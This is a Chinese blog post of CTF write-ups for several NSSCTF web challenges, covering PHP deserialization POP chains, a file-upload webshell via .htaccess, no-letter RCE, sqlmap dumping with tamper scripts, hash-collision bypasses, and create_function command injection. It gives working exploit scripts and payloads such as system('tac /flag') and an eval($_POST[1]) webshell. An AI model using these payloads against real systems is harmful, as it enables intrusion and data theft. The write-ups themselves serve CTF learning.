NSSCTF web刷题

已于 2022-08-15 15:48:43 修改
阅读量3.2k 收藏 6
点赞数 1
分类专栏: NSSCTF 文章标签: servlet php 数据库
于 2022-08-15 15:48:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/akxnxbshai/article/details/126348100
版权

目录

[鹤城杯 2021]EasyP

[SWPUCTF 2021 新生赛]pop

[SWPUCTF 2021 新生赛]easyupload3.0

[SWPUCTF 2021 新生赛]hardrce

[SWPUCTF 2021 新生赛]sql

[天翼杯 2021]esay_eval

[NISACTF 2022]level-up

[NISACTF 2022]popchains

[鹤城杯 2021]EasyP

给了源码:

<?php
include 'utils.php';

if (isset($_POST['guess'])) {
    $guess = (string) $_POST['guess'];
    if ($guess === $secret) {
        $message = 'Congratulations! The flag is: ' . $flag;
    } else {
        $message = 'Wrong. Try Again';
    }
}

if (preg_match('/utils\.php\/*$/i', $_SERVER['PHP_SELF'])) {
    exit("hacker :)");
}

if (preg_match('/show_source/', $_SERVER['REQUEST_URI'])){
    exit("hacker :)");
}

if (isset($_GET['show_source'])) {
    highlight_file(basename($_SERVER['PHP_SELF']));
    exit();
}else{
    show_source(__FILE__);
}
?>

PHP_SELF和REQUEST_URI的作用类似。

例如: 当你访问http://1.14.71.254:28356/index.php?show_source=1,这时REQUEST_URI的值便是/index.php?show_source=1,而PHP_SELF的值是/index.php,等于说REQUEST_URI会获取url后缀包括后边传入参数的内容,而PHP_SELF只会获得utl后缀,不会含有GET的参数。

发现 highlight_file(basename($_SERVER['PHP_SELF'])),可以利用highlight_file高亮回显utils.php里的内容,需要绕过两个匹配,绕过第一个很简单,basename只会返还路径中文件名部分,我们只需再utils.php/后加入中文绕过(ascii无法识别中文)。

第二个属于特性绕过(ctfshow中遇到过),当系统识别时,会把 [  (空格)  +   .当作_

Payload:

/index.php/utils.php/啊?show.source=1

[SWPUCTF 2021 新生赛]pop

<?php

error_reporting(0);
show_source("index.php");

class w44m{

    private $admin = 'aaa';
    protected $passwd = '123456';

    public function Getflag(){
        if($this->admin === 'w44m' && $this->passwd ==='08067'){
            include('flag.php');
            echo $flag;
        }else{
            echo $this->admin;
            echo $this->passwd;
            echo 'nono';
        }
    }
}

class w22m{
    public $w00m;
    public function __destruct(){
        echo $this->w00m;
    }
}

class w33m{
    public $w00m;
    public $w22m;
    public function __toString(){
        $this->w00m->{$this->w22m}();
        return 0;
    }
}

$w00m = $_GET['w00m'];
unserialize($w00m);

?>

很简单的反序列化。

从w22m:_destruct->w33m:_toString->w44m:Getflag

pop

<?php

class w44m{



    private $admin = 'w44m';

    protected $passwd = '08067';

}



class w22m{

    public $w00m;

}



class w33m{

    public $w00m;

    public $w22m;

}

$a=new w22m();

$b=new w33m();

$c=new w44m();

$a->w00m=$b;

$b->w00m=$c;

$b->w22m='Getflag';

echo urlencode(serialize($a));

?>

[SWPUCTF 2021 新生赛]easyupload3.0

简单的文件上传,首先上传.htaccess

<FilesMatch "\.jpg">

  SetHandler application/x-httpd-php

</FilesMatch>

使php解析任意文件,这里解析了jpg

然后上传jpg木马文件。

这里也没有对文件内容的检查,直接传就好。

Flag在环境变量中,可以在phpinfo中寻找,也可以直接env得到。

[SWPUCTF 2021 新生赛]hardrce

<?php
header("Content-Type:text/html;charset=utf-8");
error_reporting(0);
highlight_file(__FILE__);
if(isset($_GET['wllm']))
{
    $wllm = $_GET['wllm'];
    $blacklist = [' ','\t','\r','\n','\+','\[','\^','\]','\"','\-','\$','\*','\?','\<','\>','\=','\`',];
    foreach ($blacklist as $blackitem)
    {
        if (preg_match('/' . $blackitem . '/m', $wllm)) {
        die("LTLT说不能用这些奇奇怪怪的符号哦!");
    }}
if(preg_match('/[a-zA-Z]/is',$wllm))
{
    die("Ra's Al Ghul说不能用字母哦!");
}
echo "NoVic4说:不错哦小伙子,可你能拿到flag吗?";
eval($wllm);
}
else
{
    echo "蔡总说:注意审题!!!";
}
?>

简单的无字母rce,因为~没有被过滤,取反即可命令执行。

Payload

?wllm=(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D0%99%D5);

[SWPUCTF 2021 新生赛]sql

简单的过滤,提示参数为wllm,直接用sqlmap一把过。

Payload:

python sqlmap.py -u "http://1.14.71.254:28663/?wllm=1" -dbs --tamper "space2comment.py" --tamper "equaltolike.py" --tamper "charencode.py"
python sqlmap.py -u "http://1.14.71.254:28663/?wllm=1" -D test_db --tables --tamper "space2comment.py" --tamper "equaltolike.py" --tamper "charencode.py"
python sqlmap.py -u "http://1.14.71.254:28663/?wllm=1" -D test_db -T test_tb --columns --tamper "space2comment.py" --tamper "equaltolike.py" --tamper "charencode.py"
python sqlmap.py -u "http://1.14.71.254:28663/?wllm=1" -D test_db -T test_tb -C flag,id --dump --tamper "space2comment.py" --tamper "equaltolike.py" --tamper "charencode.py"

[天翼杯 2021]esay_eval

简单的反序列化,构造一个exp就好。

Exp:

<?php

class A{

    public $code = "eval(\$_POST[1]);";



}

class B{

    public $a;

}

$a=new A();

$b=new B();

$b->a=$a;

$poc = serialize($b);

$payload = str_replace('A":1','a":2',$poc);

echo $payload;

连接蚁剑。

然后利用蚁剑的插件绕过disable_functions提权。

直接可得到flag。

[NISACTF 2022]level-up

显而易见是让我们访问robots.txt

得到文件名称,访问。

<?php
//here is level 2
error_reporting(0);
include "str.php";
if (isset($_POST['array1']) && isset($_POST['array2'])){
    $a1 = (string)$_POST['array1'];
    $a2 = (string)$_POST['array2'];
    if ($a1 == $a2){
        die("????");
    }
    if (md5($a1) === md5($a2)){
        echo $level3;
    }
    else{
        die("level 2 failed ...");
    }

}
else{
    show_source(__FILE__);
}
?>

显而易见为md5强比较,网上搜索。

得到payload:

array1=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2

&array2=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2

得到文件名Level___3.php,继续访问。

<?php
//here is level 3
error_reporting(0);
include "str.php";
if (isset($_POST['array1']) && isset($_POST['array2'])){
    $a1 = (string)$_POST['array1'];
    $a2 = (string)$_POST['array2'];
    if ($a1 == $a2){
        die("????");
    }
    if (sha1($a1) === sha1($a2)){
        echo $level4;
    }
    else{
        die("level 3 failed ...");
    }

}
else{
    show_source(__FILE__);
}
?>

Sha1强碰撞,继续网上搜索绕过。

Payload:

array1=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01%7FF%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2V%0BE%CAg%D6%88%C7%F8K%8CLy%1F%E0%2B%3D%F6%14%F8m%B1i%09%01%C5kE%C1S%0A%FE%DF%B7%608%E9rr/%E7%ADr%8F%0EI%04%E0F%C20W%0F%E9%D4%13%98%AB%E1.%F5%BC%94%2B%E35B%A4%80-%98%B5%D7%0F%2A3.%C3%7F%AC5%14%E7M%DC%0F%2C%C1%A8t%CD%0Cx0Z%21Vda0%97%89%60k%D0%BF%3F%98%CD%A8%04F%29%A1

&array2=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01sF%DC%91f%B6%7E%11%8F%02%9A%B6%21%B2V%0F%F9%CAg%CC%A8%C7%F8%5B%A8Ly%03%0C%2B%3D%E2%18%F8m%B3%A9%09%01%D5%DFE%C1O%26%FE%DF%B3%DC8%E9j%C2/%E7%BDr%8F%0EE%BC%E0F%D2%3CW%0F%EB%14%13%98%BBU.%F5%A0%A8%2B%E31%FE%A4%807%B8%B5%D7%1F%0E3.%DF%93%AC5%00%EBM%DC%0D%EC%C1%A8dy%0Cx%2Cv%21V%60%DD0%97%91%D0k%D0%AF%3F%98%CD%A4%BCF%29%B1

继续访问查看。

<?php
//here is last level
    error_reporting(0);
    include "str.php";
    show_source(__FILE__);

    $str = parse_url($_SERVER['REQUEST_URI']);
    if($str['query'] == ""){
        echo "give me a parameter";
    }
    if(preg_match('/ |_|20|5f|2e|\./',$str['query'])){
        die("blacklist here");
    }
    if($_GET['NI_SA_'] === "txw4ever"){
        die($level5);
    }
    else{
        die("level 4 failed ...");
    }

?>

使NI_SA_等于txw4ever即可,但参数中不能有_,可以用+绕过。

Payload:

?NI+SA+=txw4ever

继续访问55_5_55.php。

<?php
//sorry , here is true last level
//^_^
error_reporting(0);
include "str.php";

$a = $_GET['a'];
$b = $_GET['b'];
if(preg_match('/^[a-z0-9_]*$/isD',$a)){
    show_source(__FILE__);
}
else{
    $a('',$b);
}

利用create_function来实现命令执行。

Payload:

?a=\create_function&b=}system(%27tac%20/flag%27);/*

[NISACTF 2022]popchains

<?php

echo 'Happy New Year~ MAKE A WISH<br>';

if(isset($_GET['wish'])){
    @unserialize($_GET['wish']);
}
else{
    $a=new Road_is_Long;
    highlight_file(__FILE__);
}
/***************************pop your 2022*****************************/

class Road_is_Long{
    public $page;
    public $string;
    public function __construct($file='index.php'){
        $this->page = $file;
    }
    public function __toString(){
        return $this->string->page;
    }

    public function __wakeup(){
        if(preg_match("/file|ftp|http|https|gopher|dict|\.\./i", $this->page)) {
            echo "You can Not Enter 2022";
            $this->page = "index.php";
        }
    }
}

class Try_Work_Hard{
    protected  $var;
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}

class Make_a_Change{
    public $effort;
    public function __construct(){
        $this->effort = array();
    }

    public function __get($key){
        $function = $this->effort;
        return $function();
    }
}
/**********************Try to See flag.php*****************************/

这个题确实挺简单,但是这句话很坑人-Try to See flag.php,起初我一直在尝试读取flag.php,没成功,一直以为我写的exp错了,试着读取了一下index.php才确定没问题。

首先要先理解题目中魔法函数的作用:

__construct   当一个对象创建时被调用,
__toString   当一个对象被当作一个字符串被调用。
__wakeup()   使用unserialize时触发
__get()    用于从不可访问的属性读取数据
#难以访问包括:(1)私有属性,(2)没有的属性
__invoke()   当脚本尝试将对象调用为函数时触发

首先确定一下哪里可以读取文件,发现Try_Work_Hard类中的append函数中存在include方法,确定以此为突破口,发现__invoke中可以调用append函数,又发现在Make_a_Change的__get方法中可以返回可控的函数方法,把function变成Try_Work_Hard类即可调用__invoke,在Road_is_Long的__toString方法中可以调用string中的page属性,使page属性为Make_a_Change类即可调用__get方法,最后在__wakeup方法中使$this->page变成类然后与字符串比较便可调用__toString,而unserialize便能直接调用__wakeup。

链子为:

Road_is_Long:: __wakeup-> Road_is_Long:: __toString-> Make_a_Change:: __get-> Try_Work_Hard:: __invoke

Exp:

<?php

class Road_is_Long{

    public $page;

    public $string;

}



class Try_Work_Hard{

    protected  $var="/flag";

}



class Make_a_Change{

    public $effort;

}

$a1=new Road_is_Long();

$a2=new Road_is_Long();

$a3=new Try_Work_Hard();

$a4=new Make_a_Change();

$a1->page=$a2;

$a2->string=$a4;

$a4->effort=$a3;

echo urlencode(serialize($a1));

payload:

?wish=O%3A12%3A"Road_is_Long"%3A2%3A%7Bs%3A4%3A"page"%3BO%3A12%3A"Road_is_Long"%3A2%3A%7Bs%3A4%3A"page"%3BN%3Bs%3A6%3A"string"%3BO%3A13%3A"Make_a_Change"%3A1%3A%7Bs%3A6%3A"effort"%3BO%3A13%3A"Try_Work_Hard"%3A1%3A%7Bs%3A6%3A"%00%2A%00var"%3Bs%3A5%3A"%2Fflag"%3B%7D%7D%7Ds%3A6%3A"string"%3BN%3B%7D

f0njl
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
nssctf文件test
03-30
1
[SWPUCTF 2021 新生赛]traditional
03-15
在 SWPUCTF 2021 新生赛的传统题目中,我们看到了一道有趣的密码题目,它与八卦图和二进制数学有着紧密的联系。莱布尼茨是西方的二进制数学的发明者,他受到中国的八卦图的启发,演绎并推论出了数学矩阵,最后创造...
[NISACTF 2022]上
qq_62046696的博客
07-26 3629
php中变量名字是由数字字母和下划线组成的,所以不论用post还是get传入变量名的时候都将空格、+、点、[转换为下划线,但是用一个特性是可以绕过的,就是当[提前出现后,后面的点就不会再被转义了,suchas`CTF[SHOW.COM`=>`CTF_SHOW.COM`打开界面本来以为是简单的get传参,结果发现有的字符不能选中,选了好几下也不可以很蹊跷,仅仅想到了可能是代替的一些东西吧,然后csdn了一下。array1[]=1&array2[]=2本来觉得数组绕过就可以可是,发现输出了?...
[SWPUCTF 2021 新生赛]easyupload3.0
kuzemax的博客
04-25 397
NSSCTF WEB 部分upload类型
最新发布
Tiny_Hacker的博客
05-29 555
上传一个文件,并用bp抓包上传失败,根据提示内容将content-type后的内容进行修改改为image/jpeg成功,尝试用蚁剑连接这个题的flag在env内。
【CTF】[SWPUCTF 2021 新生赛]easyupload3.0
西原一点红的博客
06-20 311
响应说明是黑名单校验尝试后缀绕过,发现行不通htaccessphpinfo里找到flag。
CTFshow web入门——php特性
小元砸的博客
02-20 5342
Web 89 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } }
vm虚拟机-简单题目(hgame-week4-easyvm、cg-ctf wxyVM1/2
01-08
vm 比较经典的虚拟机的题目是南邮的cg-ctf的题目, 然后先写了前面的cg-ctf的两个题目,其实当时做的时候还没太大虚拟机的感觉,后面接触到hgame的题目,然后再看的时候就感觉到有些那个意思,但是两个题目是基础...
apachecn#apachecn-ctf-wiki#CTF-AWD靶场搭建和第一题题解_星星明亮的博客-CSDN博客_awd靶
07-25
1.根据当前队伍数量copy所有的队伍的比赛文件夹: 2.启动比赛: 1.每个队伍分配到一个docker主机,给定ctf用户权限,通过制定的端口和密码进行连接
ctfshow php特性
Je3Z的博客
04-02 760
web115 web123 $a=$_SERVER['argv']; $c=$_POST['fun']; if(isset($_POST['CTF_SHOW'])&&isset($_POST['CTF_SHOW.COM'])&&!isset($_GET['fl0g'])){ if(!preg_match("/\\\\|\/|\~|\`|\!|\@|\#|\%|\^|\*|\-|\+|\=|\{|\}|\"|\'|\,|\.|\;|\?/", $c)&&
[鹤城杯 2021]EasyP
m0_70819573的博客
03-05 86
考点是php绕过,主要是陌生的函数。1.打开环境,审计代码。
Easyp 题后总结
m0_62422842的博客
04-18 471
做这题时遇见了新的函数和新的绕过,再次总结一下。 看一下题内代码 <?php include 'utils.php'; if (isset($_POST['guess'])) { $guess = (string) $_POST['guess']; if ($guess === $secret) { $message = 'Congratulations! The flag is: ' . $flag; } else { $message
[鹤城杯 2021]EasyP的题解
weixin_45446164的博客
07-14 159
​挺有意思的一道文件包含题。
[SWPUCTF 2021 新生赛]easyupload2.0
qq_62046696的博客
05-17 2817
打开以后是一个文件上传的界面,然后用burp抓包看一下 传入一个php文件,发现php是不行滴,然后想到用phtml改一下后缀,看是否可以略过 然后发现掠过了,爆出来了路径,上传成功,直接用蚁建 lianjie 链接成功,然后目录寻找flag [SWPUCTF 2021 新生赛]easyupload2.0 打开后传入一个图片码,看代码发现上传成功,然后改成php发现成功直接连蚁建,发现flag$flag = 'WLLMCTF{I_d0nt_w4nna_wak3up}';是假的,然后看了...
极客大挑战2021-部分wp
qq_53460654的博客
12-15 1433
DARK 看到后缀去搜然后洋葱浏览器下载打开即可. SYC{hav3_fUn_1n_darK} welcome2021 f12看到提示后,改为welcom的请求方式,直接curl -X 改请求方式。 访问fllllaaaggg9.php发现这是个跳转页面,抓包发送一次得到flag SYC{WeLcom3_t0_Geek_2o21!!} babysql 简单试了试1’union select 1,2,3,4#,发现有两个回显点 先爆数据库 1'union select group_concat(schem
NISACTF_WriteUp
The code way of kinnisoy
03-28 7260
WriteUp 文章目录WriteUpWEBcheckinlevel-upis secretPWNReorPwn?CRYPTOsign_cryptofunnycaesernormalxorMISC签到huaji?bqtwhere_is_here不愉快的地方福利题问卷 WEB checkin 题目: 以为白给题,结果输入不对,f12查看源码。发现一些奇怪的东西: down了源码,本地打开复制‮⁦Ugeiwo⁩⁦cuishiyuan Payload: http://120.27.195.236:28990/
nssctf的jwt问3
08-17
3. 请确保您已经导入 `java.awt.image抱歉,我无法回答有关 nssctf 的问题。我是一个与开发者有关的 AI,.BufferedImage` 和 `javax.imageio.ImageIO` 类。 您可以根据需要修改保存图片的路径和文件名。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

f0njl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值